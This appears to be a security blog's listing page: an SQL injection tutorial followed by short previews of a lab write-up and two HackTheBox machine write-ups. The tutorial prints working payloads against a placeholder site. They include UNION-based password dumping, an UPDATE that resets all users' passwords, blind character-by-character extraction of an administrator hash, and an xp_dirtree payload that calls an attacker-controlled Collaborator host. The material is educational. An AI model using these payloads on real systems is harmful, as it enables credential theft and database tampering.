SQL Injection

A SQL injection is an attack in which the attacker executes arbitrary SQL commands on an application's database by supplying malicious input that is inserted into a SQL statement. This happens when the input used in SQL queries is incorrectly filtered or escaped, and it can lead to authentication bypass, sensitive data leaks, tampering with the database and, in some cases, RCE.

In-Band (classic) SQL Injection
- Occurs when the attacker uses the same communication channel to both launch the attack and gather the result of the attack
- Retrieved data is presented directly in the web page
- Easier to exploit than other categories of SQLi

Error-Based SQLi
Error-based SQLi is an in-band SQLi technique that forces the database to generate an error, giving the attacker information upon which to refine their injection.
www.random.com/app.php?id='
#output
#You have an error in your SQL syntax, check the manual that corresponds to your MySQL server version...

Union-Based SQLi
An in-band SQLi technique that leverages the UNION SQL operator to combine the results of two queries into a single result set.
Input:
# retrieving data from another table
http://www.random.com/app.php?id=' UNION SELECT username, password FROM users; --
# update all passwords from a table with POST method
http://www.random.com/app.php?new_password="password12345';--"
query = UPDATE Users SET Password='password12345';-- WHERE Id = 2;
The WHERE clause, which specifies the criteria of the rows that should be updated, is commented out in this query. The database would update all rows in the table, changing all of the passwords in the Users table to password12345. The attacker can now log in as anyone by using that password.

Inferential (Blind) SQL Injection
- SQLi vulnerability where there is no actual transfer of data via the web app
- Just as dangerous as in-band SQLi
- The attacker is able to reconstruct the information by sending particular requests and observing the resulting behavior of the DB server
- Takes longer to exploit than in-band SQL injection

Boolean-based SQLi
Uses boolean conditions to return a different result depending on whether the query returns a TRUE or FALSE result.
www.random.com/app.php?id=1
select title from product where id=1
#Payload 1 (false)
www.random.com/app.php?id=1 and 1=2
select title from product where id=1 and 1=2
#Payload 2 (true)
www.random.com/app.php?id=1 and 1=1
select title from product where id=1 and 1=1

User table: Administrator / e3c3889ded99ej29dj9edjdje992
SUBSTRING(a,b,c): function that selects a part of a string. a: the string, b: the first position, c: how many chars
#Payload 1
www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username ='Administrator'), 1, 1)='s'
#Query
select title from product where id=1 and SUBSTRING((SELECT Password FROM Users Where Username='Administrator'),1,1)='s'
#result: nothing is returned because the condition is false
#Payload 2
www.random.com/app.php?id=1 and SUBSTRING((SELECT Password FROM Users Where Username='Administrator'),1,1)='e'
#Query
select title from product where id=1 and SUBSTRING((SELECT Password FROM Users WHERE Username='Administrator'),1,1)='e'
#result: the condition is true, so the title of product id 1 is returned, because "e" is the first character of the hashed password

Time-based Blind SQLi
Relies on the database pausing for a specified amount of time before returning the result, which indicates a successful SQL query execution.
Ex: if the first character of the administrator's hashed password is an "a", wait 10 seconds.

Out-of-band (OAST) SQLi
- Consists of triggering an out-of-band network connection to a system that you control
- Not common; uses a variety of protocols (DNS, HTTP)
'; exec master..xp_dirtree '//434934839493499.burpcollabolator.net/a'--

Second order SQLi
Second order SQLi happens when an application's user input gets stored in the database, then retrieved and used unsafely in a SQL query. For example, consider an app that registers a user by specifying a username and password, and the user submits the following request: ...

January 25, 2022 · 8 min · 1505 words · Jesus Lujan

SQL Injection - Labs

Lab 1 - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
We need to retrieve hidden data, so we look for queries in the web app where we can inject SQL injection payloads. We can see that the request is filtering the data by category, and we are asked to show the hidden elements, so we assume that there is a parameter that hides the elements. We try the following payload, which will show the elements of all categories; we comment out the rest of the query so that it does not filter by hidden or visible elements: ...

January 25, 2022 · 15 min · 3007 words · Jesus Lujan

HackTheBox Jarvis

Machine IP: 10.10.10.143
Reconnaissance
First we do a port scan to find out which ports are open and identify their corresponding services.
Nmap
As we can see, port 80 (HTTP) is open, so we will open it in the browser to see what it is and analyze the website.
Wappalyzer
Using the Wappalyzer extension to identify the technologies used on the site, we find that it is running phpMyAdmin version 4.8. After doing a bit of research we find the following vulnerability, phpMyAdmin 4.8.1 - Remote Code Execution (RCE), which takes advantage of executing commands through SQL parameters. ...

November 15, 2021 · 3 min · 566 words · Jesus Lujan

HackTheBox Writeup

Machine IP: 10.10.10.138
DATE: 25/07/2021
Machine matrix
This matrix shows us the exploitation characteristics of the machine.
Reconnaissance
First we do a port scan to find out which ports are open and identify their corresponding services.
Nmap
We use the following command to scan all ports quickly.
nmap -p- --open -T5 -v -n -Pn 10.10.10.138
Then we use this command with the ports from the previous scan to find out the version of each service. ...

July 25, 2021 · 4 min · 676 words · Jesus Lujan